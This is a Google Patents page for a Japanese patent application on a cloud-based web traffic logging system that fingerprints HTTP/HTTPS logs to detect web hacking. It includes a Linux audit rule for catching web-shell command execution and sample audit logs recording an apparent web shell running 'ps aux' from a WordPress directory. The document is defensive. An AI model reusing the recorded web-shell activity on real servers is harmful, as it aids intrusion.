JP2019533841A - ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギングシステム及び方法 - Google Patents

ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギングシステム及び方法 Download PDF

Info

Publication number
JP2019533841A
JP2019533841A JP2018549535A JP2018549535A JP2019533841A JP 2019533841 A JP2019533841 A JP 2019533841A JP 2018549535 A JP2018549535 A JP 2018549535A JP 2018549535 A JP2018549535 A JP 2018549535A JP 2019533841 A JP2019533841 A JP 2019533841A
Authority
JP
Japan
Prior art keywords
log
web
server
web traffic
traffic logging
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Withdrawn
Application number
JP2018549535A
Other languages
English (en)
Inventor
ミン シン、スン
ミン シン、スン
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Qubit Security Inc
Original Assignee
Qubit Security Inc
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Priority claimed from KR1020170126521A external-priority patent/KR101896267B1/ko
Priority claimed from KR1020180038520A external-priority patent/KR101909957B1/ko
Application filed by Qubit Security Inc filed Critical Qubit Security Inc
Publication of JP2019533841A publication Critical patent/JP2019533841A/ja
Withdrawn legal-status Critical Current

Links

Images

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/02Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1425Traffic logging, e.g. anomaly detection
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/02Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
    • H04L63/0227Filtering policies
    • H04L63/0245Filtering by information in the payload
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • H04L63/1466Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00Network arrangements or protocols for supporting network services or applications
    • H04L67/01Protocols
    • H04L67/02Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computing Systems (AREA)
  • Software Systems (AREA)
  • Theoretical Computer Science (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • Health & Medical Sciences (AREA)
  • Debugging And Monitoring (AREA)
  • Computer And Data Communications (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

【課題】本発明は、ハッキング検知技術に関し、より詳しくは、ウェブハッキングに対応するためにリアルタイムでウェブトラフィックを分析するためのロギング技術に関する。【解決手段】本発明の一実施形態によると、ウェブトラフィック分析を、パケット又はログが発生する該当のサーバで行うのではなく、遠隔地システムであるクラウドサーバでシステム攻撃を検知かつ遮断するシステムであり、ウェブアプリケーションファイアウォールと類似の効果を奏するサービスを提供することができる。【代表図】図1

Description

本発明は、ハッキング検知技術に関し、より詳しくは、ウェブハッキングに対応するため、ウェブトラフィックを分析するためのロギング技術に関する。
近年において、サーバの脆弱点を狙う攻撃は、ゼロデイ攻撃で行われており、該攻撃は、ウェブアプリケーションの脆弱点から容易かつ迅速にサーバに侵入できる方法である。
ウェブアプリケーションの脆弱点への攻撃を防御する一般的な製品は、ウェブアプリケーションファイアウォール(WAF; Web Application Firewall)である。ウェブアプリケーションファイアウォールは、OSIモデル(Open Systems Interconnection Reference Model)のウェブアプリケーションを対象とするハッキング攻撃を検知して遮断する。従来のウェブアプリケーションファイアウォール(WAF)は、ウェブアプリケーショントラフィックをホストサーバ又はリバースプロキシ(実際のウェブサーバの前段ですべてのトラフィックを受けて転送する装置)で分析し、攻撃を検知して遮断する。
ホストサーバでトラフィックを分析して遮断するウェブアプリケーションファイアウォールは、ホストサーバの性能を低下させるということが主な短所である。一方、リバースプロキシ(Reverse Proxy)ベースのウェブアプリケーションファイアウォールは、分析過程をホストサーバから分離しているため、前述のような性能の問題はないが、クラウドサービスが一般化されている環境では、構成上、使用が制限されることがあるという短所がある。ここで、クラウドサービスとは、クラウドコンピューティング(Cloud Computing)を用いたサービスであり、クラウドコンピューティングは、インターネットベースのコンピューティングの一種であり、情報を自分のコンピュータではなく、インターネットに接続された他のコンピュータで処理する技術を意味する。また、クラウドサーバとは、クラウドコンピューティングを具現するためのサーバを意味する。
また、ハッキング攻撃の検知にあたって、ウェブアプリケーションファイアウォールは、署名ベースの分析を用いる。署名分析は、既存に登録しておいた署名をトラフィックから検出する方法であり、次のような問題点がある。第一に、署名ベースの分析は、誤検出率のような問題に対処するために、多くの署名を登録する必要があるが、署名が増えるほど検出速度が遅くなる恐れがある。第二に、署名ベースの分析は、登録されていない新たな攻撃を検知することができない。
ウェブアプリケーションファイアウォールのこのような問題点から、ウェブシェル(web shell)のような悪性コードが、ウェブアプリケーションファイアウォールによって検知されて遮断されることなく、そのままウェブサーバ内部まで侵入してインストールされる可能性が非常に高い。
本発明に対する先行技術文献としては、特許文献1がある。
韓国登録特許第10−1417671号公報(登録日:2014年7月2日)
本発明は、HTTP/HTTPSプロトコルを利用するウェブトラフィックをログとして保存した後、該ログをクラウドサーバに直ちに転送するか、或いはメモリー上で該トラフィックをクラウドサーバに直ちに転送し、リアルタイム分析してハッキングを検知するので、ウェブアプリケーションファイアウォールを通過したハッキング攻撃を検知することでウェブサーバハッキングに対応することができる、ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギングシステム及び方法を提供するものである。
本発明は、ウェブトラフィック(パケット)からのハッキングに対する検知をクラウドサーバにおいて分析するので、ウェブサーバにおける性能の問題よりは大容量ログからハッキング検知が可能である、ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギングシステム及び方法を提供するものである。
本発明は、ポストボディ(POST-BODY)、レスポンスボディ(RESPONSE-BODY)に転送されるデータを含むウェブトラフィック情報を収集してフィールド別に分解し、クラウドサーバに転送してクラウドサーバで分析する、ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギングシステム及び方法を提供するものである。
本発明は、クラウドサーバにおいてウェブトラフィック情報をフィールド別に分解し、フィールド別にフィンガープリントを生成して迅速な攻撃検知が可能であり、検知可能な攻撃の範囲を広げることができる、ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギングシステム及び方法を提供するものである。
本発明の一側面によると、ウェブトラフィックロギングシステムが提供される。
本発明の一実施形態によるウェブトラフィックロギングシステムは、ウェブサーバ及びウェブサーバのオペレーティングシステムのうちの少なくとも一つのログを収集するために設定を行うログ設定部と、設定に応じて収集されたログを含むログ情報を生成するログ統合部と、前記ログ情報を前記クラウドサーバに転送するログ転送部と、を含んでもよい。
一実施形態によると、クラウドサーバは、前記ログ情報をフィールド別に分解するログ分解部と、フィールド別に前記フィンガープリントを生成するフィンガープリント生成部と、前記フィンガープリントのうち、ブラックリストに含まれたフィンガープリントに対応する攻撃フィンガープリントが存在する場合、前記ソースIPアドレスを含む検知情報を生成する検知部と、を含んでもよい。
一実施形態によると、フィンガープリントは、ログ情報に含まれた単語及び単語が含まれたフィールドに対応してあらかじめ指定された変換文字に単語を変換し、ログ情報に含まれた数字列をすべての数字に対応してあらかじめ指定された変換文字に変換した情報であってもおい。
一実施形態によると、検知部は、フィンガープリントのうち、ブラックリストに含まれたフィンガープリントに対応する攻撃フィンガープリントが存在しない場合、署名ベースの攻撃検知方法によってログ情報に対応する攻撃を検知してもよい。
一実施形態によると、ログ設定部は、ポストボディ、レスポンスボディに転送されるデータを含むログを収集し、プログラム動作位置、プログラム実行情報、プログラム実行対象形態及びプログラム実行主体、プログラム全体経路及びプログラム情報のうちの一つ以上を含むログを収集する設定を行ってもよい。
一実施形態によると、ウェブトラフィックロギングシステムは、ウェブサーバプログラムに組み込まれ、ウェブサーバ及びウェブサーバのオペレーティングシステムのうちの少なくとも一つで発生するログ生成のためのログ設定を行い、ログ設定に応じてログを生成及び統合し、生成したログ情報をクラウドサーバに転送してもよい。
一実施形態によると、ウェブトラフィックロギングシステムは、ウェブサーバプログラムとは独立して、クライアントとウェブサーバとの間の通信で発生するHTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集するモジュールから構成されて生成されたポストボディ、レスポンスボディのログ情報を前記クラウドサーバに転送してもよい。
一実施形態によると、ウェブトラフィックロギングシステムは、クライアントのリクエストに対してウェブサーバにトラフィックを転送する過程で中間に位置し、クライアントのリクエストを先に受け、これを再びウェブサーバにトラフィックを転送するリバースプロキシサーバから構成され、クライアントとウェブサーバとの間の通信で発生するHTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集して生成されたポストボディ、レスポンスボディのログ情報を前記クラウドサーバに転送してもよい。
一実施形態によると、ウェブトラフィックロギングシステムは、ポートミラーリング技法を用いてクライアントとウェブサーバとの間のトラフィックを別途のウェブトラフィックロギングサーバで統合し、HTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集して生成されたポストボディ、レスポンスボディのログ情報を前記クラウドサーバに転送してもよい。
一実施形態によると、ログ設定部は、セキュリティ原則に応じてあらかじめ設定された機密データは、アスタリスク(asterisk; *)のような特殊文字に変換することで元のデータを確認できないようにするか、或いは暗号化することでプライベートキー(秘密鍵)がある場合のみに復号化する機能設定を提供してもよい。また、機密データを事前に監視し、機密データが平文で保存されるのを防ぐための、機密データを事前に検知して推奨する設定を提供してもよい。
一実施形態によると、ログ設定部は、ウェブトラフィック又はログから事前に定義された形態の様式(フォーマット)で構成されるように設定を提供してもよい。
一実施形態によると、ログ統合部は、ログ設定部の設定に応じて、機密データは、アスタリスク(asterisk; *)のような特殊文字に変換するか、或いは暗号化し、ログ設定部の設定に応じて、機密データ推奨システムで機密データを選別して別途ファイルに記録してもよい。
一実施形態によると、ログ統合部は、ログ設定部のプロトコル設定に応じて、HTTP(80)である場合は、一般の平文分析を支援し、HTTPS(443)である場合は、ウェブサーバの証明書及びプライベートキー(Private Key)又は秘密鍵(Secret Key)を用いて暗号文を平文に変換してログを保存してもよい。
一実施形態によると、ログ転送部は、ログ統合部で統合されたログを転送する場合、転送量を減らすために、プログラム実行を行わない静的ファイルに対しては転送から除外処理できるように選択事項を提供し、圧縮及び非圧縮、暗号化及び非暗号化に対しても選択事項を提供してもよい。
本発明の他の一側面によると、ウェブトラフィックロギングシステムにおける、ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギング方法が提供される。
本発明の一実施形態によるウェブトラフィックロギング方法は、ログを収集するための設定を行うステップと、設定に応じて収集されたログを含むログ情報を生成するステップと、ログ情報をクラウドサーバに転送するステップと、を含むが、ログを収集するための設定を行うステップは、ポストボディ、レスポンスボディに転送されるデータを含むログを収集し、プログラム動作位置、プログラム実行情報、プログラム実行対象形態及びプログラム実行主体、プログラム全体経路及びプログラム情報のうちの一つ以上を含むログを収集する設定を行うステップであってもおい。
一実施形態によると、クラウドサーバがログ情報に対応するフィンガープリントを生成するステップと、クラウドサーバがフィンガープリントを分析して検知情報を生成するステップと、検知情報に応じて、ログ情報のソースIPアドレスからのアクセスを遮断するステップと、を含んでもよい。
一実施形態によると、クラウドサーバがログ情報に対応するフィンガープリントを生成するステップは、ログ情報をフィールド別に分解するステップと、フィールド別にフィンガープリントを生成するステップと、を含んでもよい。
一実施形態によると、クラウドサーバがフィンガープリントを分析して検知情報を生成するステップは、フィンガープリントのうち、ブラックリストに含まれたフィンガープリントに対応する攻撃フィンガープリントが存在する場合、ソースIPアドレスを含む検知情報を生成するステップであってもよい。
一実施形態によると、フィンガープリントは、ログ情報に含まれた単語及び単語が含まれたフィールドに対応してあらかじめ指定された変換文字に単語を変換し、ログ情報に含まれた数字列をすべての数字に対応してあらかじめ指定された変換文字に変換した情報であってもよい。
一実施形態によると、フィンガープリントのうち、ブラックリストに含まれたフィンガープリントに対応する攻撃フィンガープリントが存在しない場合、署名ベースの攻撃検知方法によってログ情報に対応する攻撃を検知するステップをさらに含んでもよい。
一実施形態によると、ウェブトラフィックロギングシステムは、ウェブサーバに組み込まれたモジュールを含むか、ウェブサーバプログラムとは独立して、クライアントとウェブサーバとの間の通信で発生するHTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集するモジュールを含むか、クライアントのリクエストに対してウェブサーバにトラフィックを転送する過程で中間に位置し、クライアントのリクエストを先に受け、これを再びウェブサーバにトラフィックを転送するリバースプロキシサーバにインストールされるモジュールを含むか、或いはポートミラーリング技法を用いてクライアントとウェブサーバとの間のトラフィックを別途のウェブトラフィックロギングサーバを含み、HTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集してポストボディ、レスポンスボディのログを生成してもよい。
上述のように、本発明の一実施形態によると、ウェブトラフィック分析においてウェブサーバにインストールされたモジュールでウェブトラフィックを分析するのではなく、ログが発生するウェブサーバとは別途の遠隔地クラウドサーバに転送して分析するので、ウェブサーバの性能の問題を解決し、クラウド環境下のウェブアプリケーション攻撃を検知して遮断するウェブアプリケーションファイアウォールと類似の効果を奏するサービスを提供することができる。
また、ウェブトラフィック分析においてウェブトラフィックのログ設定部は、ウェブトラフィック又はログから事前に定義された形態の様式(フォーマット)で構成されるように設定してもよい。そのことから、クラウドサーバがログをフィールド別に区分する際の便宜を図り、ウェブトラフィック又はログの変化が発生しても、クラウドサーバのログ分解部のシステム又はプログラムの構成変化を最小限に抑えることができる。
また、本発明の一実施形態によると、ポストボディ及びレスポンスボディに転送されるデータを含むウェブトラフィック情報を収集して分析することで、検知可能な攻撃の範囲を広げることができ、該攻撃の成功有無を正確に判断することができる。
また、クラウドサーバにポストボディ及びレスポンスボディなどのデータが長期保存されるので、問題が発生した場合は、過去のログから問題の原因を把握して解決するのに役立てることができる。
また、本発明の一実施形態によると、ログ情報をフィールド別に分解し、フィールド別のフィンガープリントを生成することで迅速な攻撃検知が可能である。
また、本発明の一実施形態によると、HTTP/HTTPSプロトコルのトラフィックをリアルタイムで転送するか、或いはログとして保存し、該ログをクラウドサーバに転送してからリアルタイムで分析してハッキングを検知するので、ウェブアプリケーションファイアウォールを通過したハッキング攻撃を検知してウェブサーバハッキングに対応することができる。
また、本発明の一実施形態によると、ログに対する署名ベースの分析をクラウドサーバ上で行うことで、ホストサーバの性能に署名ベースの分析による影響を与えないで済む。
また、本発明の一実施形態によると、ウェブトラフィックロギングシステムは、ウェブサーバに組み込まれたモジュール、ウェブサーバとは独立してウェブサーバにインストールされるモジュール、クライアントとウェブサーバとの間に設置されるリバースプロキシサーバにインストールされるモジュール又はウェブサーバのポートをミラーリングして別途のサーバでウェブトラフィックを統合するモジュールを含んでもよい。
本発明の第1の実施形態によるウェブトラフィックロギングシステムを説明するための図である。 本発明の一実施形態によるウェブトラフィックロギングシステムのウェブトラフィックロギング部を説明するための図である。 本発明の一実施形態によるウェブトラフィックロギングシステムのクラウドサーバを説明するための図である。 本発明の一実施形態によるウェブハッキングのリアルタイム検知のためのウェブトラフィックロギング方法及びログを分析して検知する方法を説明するための図である。 本発明の第2の実施形態によるウェブトラフィックロギングシステムであって、ウェブサーバに設置されるものの、ウェブサーバとは独立して動作するウェブトラフィックロギング部を説明するための図である。 本発明の第3の実施形態によるウェブトラフィックロギングシステムであって、リバースプロキシに設置されて運営されるウェブトラフィックロギング部を説明するための図である。 本発明の第4の実施形態によるウェブトラフィックロギングシステムであって、ポートミラーリング方式でウェブトラフィックロギング部を説明するための図である。
以下では、添付した図面を参照し、この発明の属する技術の分野における通常の知識を有する者が容易に実施できるように、本発明の実施形態を詳しく説明する。しかしながら、本発明は、様々な異なる形態で具現され得るものであり、ここで説明する実施形態に限定されるものではない。また、ある部分がある構成要素を「含む」とする場合、これは、特に断りのない限り、他の構成要素を除くものではなく、他の構成要素をさらに含んでもよいことを意味する。
図1は、本発明の第1の実施形態によるウェブトラフィックロギングシステムを説明するための図である。
図1を参照すると、本発明の第1の実施形態によるウェブトラフィックロギングシステムは、ウェブサーバ100、ウェブトラフィックロギング部110、及びクラウドサーバ200を含む。
ウェブサーバ100は、ウェブトラフィックロギング部110によってウェブサーバ及びウェブサーバのオペレーティングシステムのうちの少なくとも一つで収集したログ生成のためのログ設定を行い、ログ設定に応じてログを生成及び統合し、ログ情報を生成する。ウェブトラフィックロギング部110は、その後、生成したログ情報をクラウドサーバ200に転送する。ウェブトラフィックロギング部110は、クラウドサーバ200にウェブハッキング検知情報を受信するか、或いは自動で該当の情報を読み込む方法で情報を取得し、ウェブハッキング検知情報に含まれたログのソースIPアドレスを遮断リストに追加する。ウェブトラフィックロギング部110により、ウェブサーバ100又はウェブサーバのオペレーティングシステムは、遮断リストに含まれた各ソースIPアドレスからのアクセスを遮断する。
さらに詳しく説明すると、ウェブトラフィックロギング部110は、例えば、CLF(Common Log Format)、ELF(Extended Log Format)で規定された項目を含み、下記のようなログを生成して様式化する。
Cookie, Status, Server, Version, Request, Referer, User-Agent, Connection, Host, Accept-Encoding, Method, x-forwarded-for, Remote-addr, Uri, Cache-Control, Content-Length, Request-date, Content-Type, Request-Body(Post-Body), Response-Body(Resp-Body)
また、ウェブトラフィックのHTTP/HTTPSプロトコルのRequest方式としては、GET、POST、HEAD、OPTIONS、PUT、DELETE、TRACEがある。ウェブトラフィックロギング部110は、ウェブサーバのハッキングに備えるために、ウェブクライアントとウェブサーバとの間のHTTP/HTTPSプロトコル内の全ての項目においてハッキングを検知する。ウェブトラフィックロギング部110は、ポストボディ及びレスポンスボディの統合を含む。これは、ハッカーがポスト(POST)方式で本文(BODY)に攻撃データを挿入して攻撃するためであり、ポストボディの分析は重要である。また、攻撃の成功有無に対してレスポンスボディを通じて明確に判別できるので、レスポンスボディの分析も重要である。ウェブトラフィックロギング部110は、例えば、SQLインジェクション、クロスサイトスクリプティング(XSS)、そしてウェブウェル(Web Shell)のような多くのハッキングコードが挿入されて転送されるポストボディを分析することで、ウェブハッキングを検知してもよい。このように、ウェブサーバにリクエスト(Request)されたデータは、ウェブサーバのリクエストに対する応答結果が含まれている。そこで、応答結果には、実際に攻撃が成功したか否かが含まれており、攻撃が成功した場合、どのようなデータが漏洩データであるかをリアルタイムで確認することができる。ポストボディやレスポンスボディは、一般的にウェブサーバプログラムのメモリー上のみで管理され、作業の終了後に削除される特徴を有しているので、ログ分析によるハッキング検知ソリューションは、ポストボディ及びレスポンスボディの分析そのものを支援できない場合がある。
ウェブサーバ100は、ウェブサーバプログラムに組み込まれたウェブトラフィックロギング部110を含み、ウェブサーバプログラムのメモリーを共有してHTTP/HTTPSプロトコルのリクエスト及びレスポンスのすべての項目でポストボディ及びレスポンスボディのログを生成し、ポストボディ及びレスポンスボディのログをクラウドサーバ200に転送する。HTTPSプロトコルの場合、データが暗号化されているので、ウェブサーバの証明書及びプライベートキー(秘密鍵)を用いて復号化した後、データ分析を行う。
クラウドサーバ200は、複数のサーバを含み、各サーバ200は、互いに連動してログ情報を分析して攻撃を検知する。クラウドサーバ200は、クラウドサーバのみならず、遠隔地で駆動されるシステム全てを含んでもよい。例えば、各クラウドサーバ200は、互いに連動してログ情報をフィールド別に分解し、分解された各フィールドに対するフィンガープリントを生成してもよい。クラウドサーバ200は、フィンガープリントを分析して攻撃を検知できる。クラウドサーバ200は、フィンガープリントによって攻撃が検知されない場合、署名ベースの分析によってログ情報を分析してもよい。クラウドサーバ200は、フィンガープリントベースの分析又は署名ベースの分析によって攻撃を検知した場合、該ログのソースIPアドレスを含む検知情報をウェブサーバ100のウェブトラフィックロギング部110に転送するか、或いはウェブトラフィックロギング部110が周期的に接続して検知情報を読み込むようにする。各クラウドサーバ200の詳細な構成は、後述の図3を参照し、詳しく説明する。
以下、前述のウェブトラフィックロギングシステムのウェブトラフィックロギング部110及びクラウドサーバ200を詳しく説明する。
図2は、本発明の一実施形態によるウェブトラフィックロギングシステムのウェブトラフィックロギング部を説明するための図である。
図2を参照すると、ウェブトラフィックロギング部110は、ログ設定部112、ログ統合部114、ログ転送部116、及びIPアドレス遮断部118を含む。
ウェブトラフィックロギング部110は、本発明の第1の実施形態によると、ウェブサーバ100のオペレーティングシステムによって動作し、ログ設定部112、ログ統合部114、ログ転送部116、及びIPアドレス遮断部118は、オペレーティングシステム上でその動作を行ってもよい。
ログ設定部112は、ログ生成のための設定を行う。例えば、一般的なウィンドウズ(登録商標)やリナックス(登録商標)では、プログラムの実行によるサーバのパスワードのような、セキュリティ原則に応じてあらかじめ設定された機密データの漏洩、特定実行プログラムへのインジェクションによるメモリーハッキング、ホスト(hosts)ファイル修正によるフィッシングやファーミング攻撃、外部への遠隔接続からハッカーがサーバ内部にアクセスできるリバースコネクション連結のような、悪意のある行為に対するログを記録するように設定されていない。ログ設定部112は、ウィンドウズ(登録商標)の場合、高級セキュリティの監査ポリシーにおいて、個体アクセス追跡の監査及びプロセス追跡の監査を活性化するようにログ設定を行う。ログ設定部112は、ポストボディ及びレスポンスボディに転送されるデータを含むすべてのHTTP/HTTPSプロトコルを介して転送されるデータをログとして収集するようにログ設定を行う。そこで、ウェブサーバ100が用いるHTTP/HTTPSプロトコルのメソッド(Method)は、GET、PUT又はPOSTのような動詞型メソッド、HEAD又はOPTIONSのような名詞形メソッドがある。例えば、GETは、一つのリソースを呼び込むメソッドであり、POSTは、データがサーバに入るべきであること(リソースが生成又は修正されているか、或いは返信されるべき臨時文書を作成する動作など)を意味するメソッドである。ログ設定部112は、ウェブハッキング攻撃の検知能力を高めるために、ポストボディ及びレスポンスボディの内容をログとして保存するように設定する。また、ログ設定部112は、ポストボディ及びレスポンスボディの内容のうち、パスワード、個人識別番号、カード番号などのような、セキュリティ原則に応じてあらかじめ設定された機密内容は、アスタリスク(asterisk; *)のような特殊文字に変更するか、或いは暗号化する方法で保安性を強化してもよい。また、ログ設定部112は、機密内容のデータを推奨できるシステムとして、正規の表現式を用いて“/pw/, /secure/, /jumin/”などのような機密であると予測されるデータを別途のロギングによってユーザに通知するため、機密データが暗号化されず、平文でログに保存されることをあらかじめ防いでもよい。
ログ設定部112のログ設定に応じて、ウェブサーバ100のウィンドウズ(登録商標)オペレーティングシステムは、高級監査ポリシーを設定するので、下記のようなログを生成してもよい。
-<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4663</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2017-09-04T00:39:43.253443300Z" />
<EventRecordID>2780317</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="84" />
<Channel>Security</Channel>
<Computer>WIN-4BL8TBE4TQ1</Computer>
<Security />
</System>
-<EventData>
<Data Name="SubjectUserSid">S-1-5-21-172867653-2026485058-4229104567-500</Data>
<Data Name="SubjectUserName">Administrator</Data>
<Data Name="SubjectDomainName">WIN-4BL8TBE4TQ1</Data>
<Data Name="SubjectLogonId">0x3824b</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\Program Files(x86)\PLURA\@ELC_config.ini</Data>
<Data Name="HandleId">0x1204</Data>
<Data Name="AccessList">%%1538</Data>
<Data Name="AccessMask">0x20000</Data>
<Data Name="ProcessId">0x6f8</Data>
<Data Name="ProcessName">C:\Windows\explorer.exe</Data>
</EventData>
</Event>
その時、一般的なウィンドウズ(登録商標)オペレーティングシステムで生成する基本ログとは異なり、ウェブトラフィックロギング部110で生成するログは、プログラム動作位置(ObjectName)、プログラム実行情報(ProcessName)、プログラム実行対象形態(ObjectType)及びプログラム実行主体(SubjectUserName)のようなファイルアクセス検知に対する重要情報を含んでもよい。
また、ログ設定部112は、リナックス(登録商標)のウェブシェルによる攻撃などを検知するために、下記のようなコマンドによってログ設定を行ってもよい。
auditctl -a always,exit -F arch=b64 -S execve -F uid=apache
その時、リナックス(登録商標)オペレーティングシステムは、下記のようなログを生成してもよい。
type=SYSCALL msg=audit(1496192294.686:6681): arch=c000003e syscall=59 success=yes exit=0 a0=7efda2e40de9 a1=7ffd7eedab90 a2=7ffd7eedf940 a3=7efda47b3b10 items=2 ppid=62724 pid=62913 auid=4294967295 uid=48 gid=48 euid=48 suid=48 fsuid=48 egid=48 sgid=48 fsgid=48 tty=(none) ses=4294967295 comm="sh" exe="/usr/bin/bash" subj=system_u:system_r:httpd_t:s0 key="webshell"
type=EXECVE msg=audit(1496192294.686:6681): argc=3 a0="sh" a1="-c" a2=70732061757820323E2631
type=CWD msg=audit(1496192294.686:6681): cwd="/var/www/html/wordpress"
type=PATH msg=audit(1496192294.686:6681): item=0 name="/bin/sh" inode=33681891 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:shell_exec_t:s0 objtype=NORMAL
type=PATH msg=audit(1496192294.686:6681): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=70629119 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL
type=SYSCALL msg=audit(1496192294.690:6682): arch=c000003e syscall=59 success=yes exit=0 a0=7efda2e40de9 a1=7ffd7eedab90 a2=7ffd7eedf940 a3=7efda47b3b10 items=2 ppid=62704 pid=62914 auid=4294967295 uid=48 gid=48 euid=48 suid=48 fsuid=48 egid=48 sgid=48 fsgid=48 tty=(none) ses=4294967295 comm="sh" exe="/usr/bin/bash" subj=system_u:system_r:httpd_t:s0 key="webshell"
type=EXECVE msg=audit(1496192294.690:6682): argc=3 a0="sh" a1="-c" a2=70732061757820323E2631
type=CWD msg=audit(1496192294.690:6682): cwd="/var/www/html/wordpress"
type=PATH msg=audit(1496192294.690:6682): item=0 name="/bin/sh" inode=33681891 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:shell_exec_t:s0 objtype=NORMAL
type=PATH msg=audit(1496192294.690:6682): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=70629119 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL
type=SYSCALL msg=audit(1496192294.693:6683): arch=c000003e syscall=59 success=yes exit=0 a0=dc3a50 a1=dc3d50 a2=dc2af0 a3=7ffd0b2c6a10 items=2 ppid=62913 pid=62915 auid=4294967295 uid=48 gid=48 euid=48 suid=48 fsuid=48 egid=48 sgid=48 fsgid=48 tty=(none) ses=4294967295 comm="ps" exe="/usr/bin/ps" subj=system_u:system_r:httpd_t:s0 key="webshell"
type=EXECVE msg=audit(1496192294.693:6683): argc=2 a0="ps" a1="aux"
type=CWD msg=audit(1496192294.693:6683): cwd="/var/www/html/wordpress"
type=PATH msg=audit(1496192294.693:6683): item=0 name="/usr/bin/ps" inode=33612338 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:bin_t:s0 objtype=NORMAL
type=PATH msg=audit(1496192294.693:6683): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=70629119 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL
type=SYSCALL msg=audit(1496192294.704:6684): arch=c000003e syscall=59 success=yes exit=0 a0=c8ba50 a1=c8bd50 a2=c8aaf0 a3=7ffddd6bcc70 items=2 ppid=62914 pid=62916 auid=4294967295 uid=48 gid=48 euid=48 suid=48 fsuid=48 egid=48 sgid=48 fsgid=48 tty=(none) ses=4294967295 comm="ps" exe="/usr/bin/ps" subj=system_u:system_r:httpd_t:s0 key="webshell"
type=EXECVE msg=audit(1496192294.704:6684): argc=2 a0="ps" a1="aux"
type=CWD msg=audit(1496192294.704:6684): cwd="/var/www/html/wordpress"
type=PATH msg=audit(1496192294.704:6684): item=0 name="/usr/bin/ps" inode=33612338 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:bin_t:s0 objtype=NORMAL
